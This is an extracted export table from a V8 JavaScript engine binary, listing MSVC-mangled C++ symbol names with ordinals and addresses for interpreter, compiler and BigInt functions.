                                                                                                                                                                                                        ?BeginHandler@TryFinallyBuilder@interpreter@internal@v8@@QEAAXXZ35460x1408f38c0
                                                                                                                                                                                                        ?BeginRegion@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4RegionObservability@234@@Z35470x140eb2380
                                                                                                                                                                                                        ?BeginTry@TryCatchBuilder@interpreter@internal@v8@@QEAAXVRegister@234@@Z35480x1408f38f0
                                                                                                                                                                                                        ?BeginTry@TryFinallyBuilder@interpreter@internal@v8@@QEAAXVRegister@234@@Z35490x1408f38f0
                                                                                                                                                                                                        ?BigInt64Array_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ35500x140482970
                                                                                                                                                                                                        ?BigInt64Array_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ35510x1406cd3e0
                                                                                                                                                                                                        ?BigInt@Type@compiler@internal@v8@@SA?AV1234@XZ35520x1404bb450
                                                                                                                                                                                                        ?BigIntAdd@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@0@Z35530x1410a0a80
                                                                                                                                                                                                        ?BigIntAdd@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35540x140f4b930
                                                                                                                                                                                                        ?BigIntMapConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ35550x140f55860
                                                                                                                                                                                                        ?BigIntMapConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VMap@internal@v8@@@34@XZ35560x140f58cd0
                                                                                                                                                                                                        ?BigIntNegate@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z35570x1410a0ab0
                                                                                                                                                                                                        ?BigIntNegate@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35580x140f4b940
                                                                                                                                                                                                        ?BigIntSubtract@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@0@Z35590x1410a0a80
                                                                                                                                                                                                        ?BigIntSubtract@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35600x140f4b950
                                                                                                                                                                                                        ?BigInt_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ35610x140482980
                                                                                                                                                                                                        ?BigInt_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ35620x1406cd3f0
                                                                                                                                                                                                        ?BigUint64Array_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ35630x140482990
                                                                                                                                                                                                        ?BigUint64Array_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ35640x1406cd400
                                                                                                                                                                                                        ?BigitAt@Bignum@base@v8@@AEBAIH@Z35650x140e70520
                                                                                                                                                                                                        ?BigitLength@Bignum@base@v8@@AEBAHXZ35660x140e6a080
                                                                                                                                                                                                        ?BigitsShiftLeft@Bignum@base@v8@@AEAAXH@Z35670x140e70550
                                                                                                                                                                                                        ?BignumDtoa@base@v8@@YAXNW4BignumDtoaMode@12@HV?$Vector@D@12@PEAH2@Z35680x140e6d560
                                                                                                                                                                                                        ?BinaryOpForAssignment@Token@internal@v8@@SA?AW4Value@123@W44123@@Z35690x140476290
                                                                                                                                                                                                        ?BinaryOperation@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4Value@Token@34@VRegister@234@H@Z35700x140919320
                                                                                                                                                                                                        ?BinaryOperationSmiLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4Value@Token@34@VSmi@34@H@Z35710x140919d40
                                                                                                                                                                                                        ?Bind@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEAVBytecodeJumpTable@234@H@Z35720x14091a800
                                                                                                                                                                                                        ?Bind@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEAVBytecodeLabel@234@@Z35730x14091a850
                                                                                                                                                                                                        ?Bind@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEAVBytecodeLoopHeader@234@@Z35740x14091a8a0
                                                                                                                                                                                                        ?Bind@BytecodeLabels@interpreter@internal@v8@@QEAAXPEAVBytecodeArrayBuilder@234@@Z35750x1408f9bb0
                                                                                                                                                                                                        ?Bind@CodeAssembler@compiler@internal@v8@@QEAAXPEAVCodeAssemblerLabel@234@@Z35760x140f1e180
                                                                                                                                                                                                        ?Bind@CodeAssemblerLabel@compiler@internal@v8@@AEAAXXZ35770x140f1e1b0
                                                                                                                                                                                                        ?Bind@CodeAssemblerVariable@compiler@internal@v8@@IEAAXPEAVNode@234@@Z35780x140f1e1e0
                                                                                                                                                                                                        ?Bind@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVRawMachineLabel@234@@Z35790x14108c130
                                                                                                                                                                                                        ?Bind@RegExpBytecodeGenerator@internal@v8@@UEAAXPEAVLabel@23@@Z35800x14073c870
                                                                                                                                                                                                        ?Bind@RegExpMacroAssemblerX64@internal@v8@@UEAAXPEAVLabel@23@@Z35810x1404aa7d0
                                                                                                                                                                                                        ?BindBasicBlock@GraphAssembler@compiler@internal@v8@@IEAAXPEAVBasicBlock@234@@Z35820x140f58d30
                                                                                                                                                                                                        ?BindBreakTarget@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXXZ35830x1408f3900
                                                                                                                                                                                                        ?BindCaseTargetForCompareJump@SwitchBuilder@interpreter@internal@v8@@QEAAXHPEAVCaseClause@34@@Z35840x1408f3910
                                                                                                                                                                                                        ?BindCaseTargetForJumpTable@SwitchBuilder@interpreter@internal@v8@@QEAAXHPEAVCaseClause@34@@Z35850x1408f3990
                                                                                                                                                                                                        ?BindContinueTarget@LoopBuilder@interpreter@internal@v8@@QEAAXXZ35860x1408f39f0
                                                                                                                                                                                                        ?BindDefault@SwitchBuilder@interpreter@internal@v8@@QEAAXPEAVCaseClause@34@@Z35870x1408f3a00
                                                                                                                                                                                                        ?BindExceptionHandler@TurboAssembler@internal@v8@@QEAAXPEAVLabel@23@@Z35880x14049b840
                                                                                                                                                                                                        ?BindHandlerTarget@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVHandlerTableBuilder@234@H@Z35890x140912330
                                                                                                                                                                                                        ?BindJumpTableEntry@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVBytecodeJumpTable@234@H@Z35900x140912360
                                                                                                                                                                                                        ?BindLabel@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVBytecodeLabel@234@@Z35910x1409123b0
                                                                                                                                                                                                        ?BindLoopEnd@LoopBuilder@interpreter@internal@v8@@AEAAXXZ35920x1408f3a60
                                                                                                                                                                                                        ?BindLoopHeader@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVBytecodeLoopHeader@234@@Z35930x1409123f0
                                                                                                                                                                                                        ?BindToCurrentContext@UnboundScript@v8@@QEAA?AV?$Local@VScript@v8@@@2@XZ35940x140b08aa0
                                                                                                                                                                                                        ?BindTryRegionEnd@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVHandlerTableBuilder@234@H@Z35950x140912410
                                                                                                                                                                                                        ?BindTryRegionStart@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVHandlerTableBuilder@234@H@Z35960x140912430
                                                                                                                                                                                                        ?BitcastFloat32ToInt32@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUint32T@internal@v8@@@34@V?$TNode@UFloat32T@internal@v8@@@34@@Z35970x140f1e1f0
                                                                                                                                                                                                        ?BitcastFloat32ToInt32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z35980x140f58d80
                                                                                                                                                                                                        ?BitcastFloat32ToInt32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35990x140eca460
                                                                                                                                                                                                        ?BitcastFloat32ToInt32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36000x140f1e250
                                                                                                                                                                                                        ?BitcastFloat64ToInt64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36010x140f58de0
                                                                                                                                                                                                        ?BitcastFloat64ToInt64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36020x140eca470
                                                                                                                                                                                                        ?BitcastFloat64ToInt64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36030x140f1e290
                                                                                                                                                                                                        ?BitcastInt32ToFloat32@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat32T@internal@v8@@@34@V?$TNode@UWord32T@internal@v8@@@34@@Z36040x140f1e2d0
                                                                                                                                                                                                        ?BitcastInt32ToFloat32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36050x140f58e40
                                                                                                                                                                                                        ?BitcastInt32ToFloat32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36060x140eca480
                                                                                                                                                                                                        ?BitcastInt32ToFloat32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36070x140f1e330
                                                                                                                                                                                                        ?BitcastInt64ToFloat64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36080x140f58ea0
                                                                                                                                                                                                        ?BitcastInt64ToFloat64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36090x140eca490
                                                                                                                                                                                                        ?BitcastInt64ToFloat64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36100x140f1e370
                                                                                                                                                                                                        ?BitcastMaybeObjectToWord@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$TNode@VMaybeObject@internal@v8@@@34@@Z36110x140f1e3b0
                                                                                                                                                                                                        ?BitcastMaybeObjectToWord@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36120x140f58f00
                                                                                                                                                                                                        ?BitcastMaybeObjectToWord@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36130x140eca4a0
                                                                                                                                                                                                        ?BitcastMaybeObjectToWord@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36140x140f1e410
                                                                                                                                                                                                        ?BitcastTaggedToWord@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$TNode@VObject@internal@v8@@@34@@Z36150x140f1e450
                                                                                                                                                                                                        ?BitcastTaggedToWord@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36160x140f58f90
                                                                                                                                                                                                        ?BitcastTaggedToWord@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36170x140eca4b0
                                                                                                                                                                                                        ?BitcastTaggedToWord@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36180x140f1e4b0
                                                                                                                                                                                                        ?BitcastTaggedToWordForTagAndSmiBits@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$TNode@U?$UnionT@VObject@internal@v8@@VMaybeObject@23@@internal@v8@@@34@@Z36190x140f1e4f0
                                                                                                                                                                                                        ?BitcastTaggedToWordForTagAndSmiBits@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36200x140f59020
                                                                                                                                                                                                        ?BitcastTaggedToWordForTagAndSmiBits@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36210x140eca4c0
                                                                                                                                                                                                        ?BitcastTaggedToWordForTagAndSmiBits@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36220x140f1e550
                                                                                                                                                                                                        ?BitcastWord32ToWord64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36230x140f59080
                                                                                                                                                                                                        ?BitcastWord32ToWord64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36240x140eca4d0
                                                                                                                                                                                                        ?BitcastWordToTagged@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VObject@internal@v8@@@34@V?$TNode@UWordT@internal@v8@@@34@@Z36250x140f1e590
                                                                                                                                                                                                        ?BitcastWordToTagged@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36260x140f590e0
                                                                                                                                                                                                        ?BitcastWordToTagged@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36270x140eca4e0
                                                                                                                                                                                                        ?BitcastWordToTagged@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36280x140f1e5f0
                                                                                                                                                                                                        ?BitcastWordToTaggedSigned@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VSmi@internal@v8@@@34@V?$TNode@UWordT@internal@v8@@@34@@Z36290x140f1e630
                                                                                                                                                                                                        ?BitcastWordToTaggedSigned@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36300x140f59170
                                                                                                                                                                                                        ?BitcastWordToTaggedSigned@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36310x140eca4f0
                                                                                                                                                                                                        ?BitcastWordToTaggedSigned@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36320x140f1e690
                                                                                                                                                                                                        ?BitsetGlb@Type@compiler@internal@v8@@AEBAIXZ36330x140e9f9e0
                                                                                                                                                                                                        ?BitsetGlbForTesting@Type@compiler@internal@v8@@QEAA?AV1234@XZ36340x1404bb460
                                                                                                                                                                                                        ?BitsetLub@Type@compiler@internal@v8@@AEBAIXZ36350x140e9fa60
                                                                                                                                                                                                        ?BitsetLubForTesting@Type@compiler@internal@v8@@QEAA?AV1234@XZ36360x1404bb480
                                                                                                                                                                                                        ?BitwiseAnd@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z36370x140f3a220
                                                                                                                                                                                                        ?BitwiseNot@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z36380x140f3a2e0
                                                                                                                                                                                                        ?BitwiseOr@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z36390x140f3a3a0
                                                                                                                                                                                                        ?BitwiseXor@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z36400x140f3a460
                                                                                                                                                                                                        ?Blendvpd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@000@Z36410x140501030
                                                                                                                                                                                                        ?Blendvps@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@000@Z36420x1405010c0
                                                                                                                                                                                                        ?BlockCount@FunctionData@Coverage@debug@v8@@QEBA_KXZ36430x140a6daf0
                                                                                                                                                                                                        ?BoolConstant@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@_N@Z36440x140ab2250
                                                                                                                                                                                                        ?Boolean@Type@compiler@internal@v8@@SA?AV1234@XZ36450x1404bb4a0
                                                                                                                                                                                                        ?BooleanConstant@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@_N@Z36460x140f1e6d0
                                                                                                                                                                                                        ?BooleanConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@_N@Z36470x140ed43d0
                                                                                                                                                                                                        ?BooleanMapConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ36480x140f558e0
                                                                                                                                                                                                        ?BooleanMapConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VMap@internal@v8@@@34@XZ36490x140f591d0
                                                                                                                                                                                                        ?BooleanNot@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36500x140078aa0
                                                                                                                                                                                                        ?BooleanOrNullOrNumber@Type@compiler@internal@v8@@SA?AV1234@XZ36510x1404bb4b0
                                                                                                                                                                                                        ?BooleanOrNullOrUndefined@Type@compiler@internal@v8@@SA?AV1234@XZ36520x1404bb4c0
                                                                                                                                                                                                        ?BooleanOrNumber@Type@compiler@internal@v8@@SA?AV1234@XZ36530x1404bb4d0
                                                                                                                                                                                                        ?BooleanValue@Object@internal@v8@@QEAA_NPEAVIsolate@23@@Z36540x1407f24e0
                                                                                                                                                                                                        ?BooleanValue@Value@v8@@QEBA_NPEAVIsolate@2@@Z36550x140b08b70
                                                                                                                                                                                                        ?Boolean_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ36560x1404829a0
                                                                                                                                                                                                        ?Boolean_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ36570x1406cd410
                                                                                                                                                                                                        ?BoundFunction@Type@compiler@internal@v8@@SA?AV1234@XZ36580x1404bb4e0
                                                                                                                                                                                                        ?Boundaries@BitsetType@compiler@internal@v8@@CAPEBUBoundary@1234@XZ36590x140e9fb40
                                                                                                                                                                                                        ?BoundariesArray@BitsetType@compiler@internal@v8@@0QBUBoundary@1234@B36600x141b19540
                                                                                                                                                                                                        ?BoundariesSize@BitsetType@compiler@internal@v8@@CA_KXZ36610x1404ae070
                                                                                                                                                                                                        ?BoundsCheck@ModuleWireBytes@wasm@internal@v8@@QEBA_NVWireBytesRef@234@@Z36620x1404829b0
                                                                                                                                                                                                        ?BracketListDelete@ControlEquivalence@compiler@internal@v8@@AEAAXAEAV?$ZoneLinkedList@UBracket@ControlEquivalence@compiler@internal@v8@@@34@PEAVNode@234@W4DFSDirection@1234@@Z36630x14109f210
                                                                                                                                                                                                        ?BracketListTRACE@ControlEquivalence@compiler@internal@v8@@AEAAXAEAV?$ZoneLinkedList@UBracket@ControlEquivalence@compiler@internal@v8@@@34@@Z36640x14109f2c0
                                                                                                                                                                                                        ?Branch@BranchMatcher@compiler@internal@v8@@QEBAPEAVNode@234@XZ36650x140078aa0
                                                                                                                                                                                                        ?Branch@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UBoolT@internal@v8@@@34@AEBV?$function@$$A6AXXZ@std@@1@Z36660x140f1e710
                                                                                                                                                                                                        ?Branch@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UBoolT@internal@v8@@@34@AEBV?$function@$$A6AXXZ@std@@PEAVCodeAssemblerLabel@234@@Z36670x140f1e960
                                                                                                                                                                                                        ?Branch@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UBoolT@internal@v8@@@34@PEAVCodeAssemblerLabel@234@AEBV?$function@$$A6AXXZ@std@@@Z36680x140f1eb20
                                                                                                                                                                                                        ?Branch@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UIntegralT@internal@v8@@@34@PEAVCodeAssemblerLabel@234@1@Z36690x140f1ece0
                                                                                                                                                                                                        ?Branch@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4BranchHint@234@W4IsSafetyCheck@234@@Z36700x140eb23c0
                                                                                                                                                                                                        ?Branch@DiamondMatcher@compiler@internal@v8@@QEBAPEAVNode@234@XZ36710x140078d50
                                                                                                                                                                                                        ?Branch@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@PEAVRawMachineLabel@234@1@Z36720x14108c180
                                                                                                                                                                                                        ?BranchHintOf@compiler@internal@v8@@YA?AW4BranchHint@123@QEBVOperator@123@@Z36730x140eb24a0
                                                                                                                                                                                                        ?BranchOperatorInfoOf@compiler@internal@v8@@YAAEBUBranchOperatorInfo@123@QEBVOperator@123@@Z36740x14032ab80
                                                                                                                                                                                                        ?BranchOrBacktrack@RegExpMacroAssemblerX64@internal@v8@@AEAAXW4Condition@23@PEAVLabel@23@@Z36750x1404aa7f0
                                                                                                                                                                                                        ?BranchWithCriticalSafetyCheck@GraphAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@PEAV?$GraphAssemblerLabel@$0A@@234@1@Z36760x140f59230
                                                                                                                                                                                                        ?Break@BreakableControlFlowBuilder@interpreter@internal@v8@@QEAAXXZ36770x1408f3a70
                                                                                                                                                                                                        ?Break@Debug@internal@v8@@QEAAXPEAVJavaScriptFrame@23@V?$Handle@VJSFunction@internal@v8@@@23@@Z36780x140a5d250
                                                                                                                                                                                                        ?BreakDownTime@DateCache@internal@v8@@QEAAX_JPEAH1111111@Z36790x140a79260
                                                                                                                                                                                                        ?BreakIfFalse@BreakableControlFlowBuilder@interpreter@internal@v8@@QEAAXW4ToBooleanMode@BytecodeArrayBuilder@234@@Z36800x1408f3aa0
                                                                                                                                                                                                        ?BreakIfNull@BreakableControlFlowBuilder@interpreter@internal@v8@@QEAAXXZ36810x1408f3ad0
                                                                                                                                                                                                        ?BreakIfTrue@BreakableControlFlowBuilder@interpreter@internal@v8@@QEAAXW4ToBooleanMode@BytecodeArrayBuilder@234@@Z36820x1408f3b00
                                                                                                                                                                                                        ?BreakIfUndefined@BreakableControlFlowBuilder@interpreter@internal@v8@@QEAAXXZ36830x1408f3b30
                                                                                                                                                                                                        ?BreakIndexFromPosition@BreakIterator@internal@v8@@AEAAHH@Z36840x140a5d8e0
                                                                                                                                                                                                        ?BreakOnNode@CodeAssembler@compiler@internal@v8@@QEAAXH@Z36850x140f1ede0
                                                                                                                                                                                                        ?BreakRightNow@debug@v8@@YAXPEAVIsolate@2@@Z36860x140a6db20
                                                                                                                                                                                                        ?BroadcastSharedWasmMemoryGrow@BackingStore@internal@v8@@SAXPEAVIsolate@23@V?$shared_ptr@VBackingStore@internal@v8@@@std@@@Z36870x1408c9560
                                                                                                                                                                                                        ?Buffer@ArrayBufferView@v8@@QEAA?AV?$Local@VArrayBuffer@v8@@@2@XZ36880x140b08b90
                                                                                                                                                                                                        ?Buffer@WasmMemoryObject@v8@@QEAA?AV?$Local@VArrayBuffer@v8@@@2@XZ36890x140a6f020
                                                                                                                                                                                                        ?Build@CodeBuilder@Factory@internal@v8@@QEAA?AV?$Handle@VCode@internal@v8@@@34@XZ36900x1409ce450
                                                                                                                                                                                                        ?Build@JSFunctionBuilder@Factory@internal@v8@@QEAA?AV?$Handle@VJSFunction@internal@v8@@@34@XZ36910x1409ce490
                                                                                                                                                                                                        ?BuildBlockCoverage@SwitchBuilder@interpreter@internal@v8@@AEAAXPEAVCaseClause@34@@Z36920x1408f3b60
                                                                                                                                                                                                        ?BuildCFG@Scheduler@compiler@internal@v8@@AEAAXXZ36930x14104f320
                                                                                                                                                                                                        ?BuildCheckEqualsName@JSNativeContextSpecialization@compiler@internal@v8@@AEAAPEAVNode@234@AEBVNameRef@234@PEAV5234@11@Z36940x1410176d0
                                                                                                                                                                                                        ?BuildDescriptorArray@MapUpdater@internal@v8@@AEAA?AV?$Handle@VDescriptorArray@internal@v8@@@23@XZ36950x140816040
                                                                                                                                                                                                        ?BuildElementAccess@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AVValueEffectControl@1234@PEAVNode@234@0000AEBVElementAccessInfo@234@AEBVKeyedAccessMode@234@@Z36960x141017780
                                                                                                                                                                                                        ?BuildExtendPropertiesBackingStore@JSNativeContextSpecialization@compiler@internal@v8@@AEAAPEAVNode@234@AEBVMapRef@234@PEAV5234@11@Z36970x141019620
                                                                                                                                                                                                        ?BuildGetModuleCell@JSTypedLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z36980x141026220
                                                                                                                                                                                                        ?BuildIndexedStringLoad@JSNativeContextSpecialization@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@00PEAPEAV5234@1W4KeyedAccessLoadMode@34@@Z36990x141019b90
                                                                                                                                                                                                        ?BuildInitialYield@Parser@internal@v8@@AEAAPEAVExpression@23@HW4FunctionKind@23@@Z37000x1407a3af0
                                                                                                                                                                                                        ?BuildInitializationBlock@Parser@internal@v8@@AEAAPEAVStatement@23@PEAUDeclarationParsingResult@?$ParserBase@VParser@internal@v8@@@23@@Z37010x1407a3c30
                                                                                                                                                                                                        ?BuildInlinedJSToWasmWrapper@compiler@internal@v8@@YAXPEAVZone@23@PEAVMachineGraph@123@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@PEBUWasmModule@wasm@23@PEAVIsolate@23@PEAVSourcePositionTable@123@W4StubCallMode@23@VWasmFeatures@823@PEBVJSWasmCallData@123@PEAVNode@123@@Z37020x140ef3d90
                                                                                                                                                                                                        ?BuildInternal@CodeBuilder@Factory@internal@v8@@AEAA?AV?$MaybeHandle@VCode@internal@v8@@@34@_N@Z37030x1409ce580
                                                                                                                                                                                                        ?BuildLoadPrototypeFromObject@JSNativeContextSpecialization@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@00@Z37040x14101a070
                                                                                                                                                                                                        ?BuildLoopTree@LoopFinder@compiler@internal@v8@@SAPEAVLoopTree@234@PEAVGraph@234@PEAVTickCounter@34@PEAVZone@34@@Z37050x141039480
                                                                                                                                                                                                        ?BuildParameterInitializationBlock@Parser@internal@v8@@AEAAPEAVBlock@23@AEBUParserFormalParameters@23@@Z37060x1407a3d40
                                                                                                                                                                                                        ?BuildPropertyAccess@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AV?$Optional@VValueEffectControl@JSNativeContextSpecialization@compiler@internal@v8@@@base@4@PEAVNode@234@000000AEBVNameRef@234@PEAV?$ZoneVector@PEAVNode@compiler@internal@v8@@@34@AEBVPropertyAccessInfo@234@W4AccessMode@234@@Z37070x14101a160
                                                                                                                                                                                                        ?BuildPropertyLoad@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AV?$Optional@VValueEffectControl@JSNativeContextSpecialization@compiler@internal@v8@@@base@4@PEAVNode@234@00000AEBVNameRef@234@PEAV?$ZoneVector@PEAVNode@compiler@internal@v8@@@34@AEBVPropertyAccessInfo@234@@Z37080x14101a2f0
                                                                                                                                                                                                        ?BuildPropertyStore@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AVValueEffectControl@1234@PEAVNode@234@00000AEBVNameRef@234@PEAV?$ZoneVector@PEAVNode@compiler@internal@v8@@@34@AEBVPropertyAccessInfo@234@W4AccessMode@234@@Z37090x14101a5a0
                                                                                                                                                                                                        ?BuildPropertyTest@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AVValueEffectControl@1234@PEAVNode@234@0AEBVPropertyAccessInfo@234@@Z37100x14101b270
                                                                                                                                                                                                        ?BuildRaw@JSFunctionBuilder@Factory@internal@v8@@AEAA?AV?$Handle@VJSFunction@internal@v8@@@34@V?$Handle@VCode@internal@v8@@@34@@Z37110x1409cefd0
                                                                                                                                                                                                        ?BuildRejectPromiseOnException@Parser@internal@v8@@AEAAPEAVBlock@23@PEAV423@W4REPLMode@23@@Z37120x1407a40f0
                                                                                                                                                                                                        ?BuildReturnStatement@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAPEAVStatement@23@PEAVExpression@23@HH@Z37130x1407738d0
                                                                                                                                                                                                        ?BuildTFGraph@wasm@internal@v8@@YA?AV?$Result@$$T@123@PEAVAccountingAllocator@23@AEBVWasmFeatures@123@PEBUWasmModule@123@PEAVWasmGraphBuilder@compiler@23@PEAV6123@AEBUFunctionBody@123@PEAV?$vector@UWasmLoopInfo@compiler@internal@v8@@V?$allocator@UWasmLoopInfo@compiler@internal@v8@@@std@@@std@@PEAVNodeOriginTable@923@H@Z37140x1405a6770
                                                                                                                                                                                                        ?BuildTranslation@CodeGenerator@compiler@internal@v8@@AEAAPEAVDeoptimizationExit@234@PEAVInstruction@234@H_K1VOutputFrameStateCombine@234@@Z37150x140ee6bd0
                                                                                                                                                                                                        ?BuildTranslationForFrameStateDescriptor@CodeGenerator@compiler@internal@v8@@AEAAXPEAVFrameStateDescriptor@234@PEAVInstructionOperandIterator@234@VOutputFrameStateCombine@234@@Z37160x140ee70a0
                                                                                                                                                                                                        ?BuildTree@StateValuesCache@compiler@internal@v8@@AEAAPEAVNode@234@PEA_KPEAPEAV5234@_KPEBVBitVector@34@H2@Z37170x140f57030
                                                                                                                                                                                                        ?BuildUnaryExpression@Parser@internal@v8@@AEAAPEAVExpression@23@PEAV423@W4Value@Token@23@H@Z37180x1407a44b0
                                                                                                                                                                                                        ?BuiltinEntry@TurboAssemblerBase@internal@v8@@QEAA_KW4Builtin@23@@Z37190x140a7dde0
                                                                                                                                                                                                        ?ByteLength@ArrayBuffer@v8@@QEBA_KXZ37200x140b08cc0
                                                                                                                                                                                                        ?ByteLength@ArrayBufferView@v8@@QEAA_KXZ37210x140b08cd0
                                                                                                                                                                                                        ?ByteLength@BackingStore@v8@@QEBA_KXZ37220x140078d50
                                                                                                                                                                                                        ?ByteLength@Contents@ArrayBuffer@v8@@QEBA_KXZ37230x140078d50
                                                                                                                                                                                                        ?ByteLength@Contents@SharedArrayBuffer@v8@@QEBA_KXZ37240x140078d50
                                                                                                                                                                                                        ?ByteLength@SharedArrayBuffer@v8@@QEBA_KXZ37250x140b08cc0
                                                                                                                                                                                                        ?ByteOffset@ArrayBufferView@v8@@QEAA_KXZ37260x140b08cf0
                                                                                                                                                                                                        ?Bytecode@JSRegExp@internal@v8@@QEBA?AVObject@23@_N@Z37270x14082cc10
                                                                                                                                                                                                        ?BytecodeHasHandler@Bytecodes@interpreter@internal@v8@@SA_NW4Bytecode@234@W4OperandScale@234@@Z37280x1408f6400
